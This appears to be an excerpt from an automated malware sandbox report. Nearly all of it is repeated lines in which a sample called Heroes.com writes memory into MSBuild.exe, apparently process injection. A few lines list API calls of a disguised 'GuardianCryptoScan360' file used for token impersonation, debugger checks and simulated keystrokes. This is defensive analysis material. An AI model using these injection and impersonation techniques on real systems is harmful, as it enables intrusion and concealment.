                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344E84Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344EE8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344F4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344FB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345014Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345078Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13450DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345140Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13451A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345208Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134526CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13452D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345334Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345398Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13453FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345460Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13454C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345528Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134558CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13455F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345654Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13456B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134571CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345780Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13457E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345848Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13458ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345910Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345974Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13459D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345A3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345AA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345B04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345B68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345BCCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345C30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345C94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345CF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345D5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345DC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345E24Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345E88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345EECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345F50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345FB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346018Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134607CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13460E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346144Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13461A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134620CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346270Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13462D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346338Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134639CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346400Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346464Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13464C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134652CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346590Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13465F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346658Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13466BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346720Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346784Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13467E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134684CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13468B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346914Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346978Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13469DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346A40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346AA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346B08Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346B6CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346BD0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346C34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346C98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346CFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346D60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346DC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346E28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346E8CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346EF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346F54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346FB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134701CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347080Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13470E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347148Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13471ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347210Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347274Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13472D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134733CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13473A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347404Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347468Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13474CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347530Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347594Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13475F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134765CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13476C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347724Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347788Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13477ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347850Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13478B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347918Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134797CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13479E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347A44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347AA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347B0CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347B70Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347BD4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347C38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347C9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347D00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347D64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347DC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347E2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347E90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347EF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347F58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347FBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348020Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348084Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13480E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134814CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13481B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348214Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348278Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13482DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348340Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13483A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348408Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134846CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13484D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348534Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348598Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13485FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348660Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13486C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348728Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134878CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13487F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348854Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13488B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134891CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348980Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13489E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348A48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348AACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348B10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348B74Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348BD8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348C3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348CA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348D04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348D68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1348DCCJump to behavior
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_00781B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,28_2_00781B4D
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_0072338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,28_2_0072338B
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_0078BBED SendInput,keybd_event,28_2_0078BBED
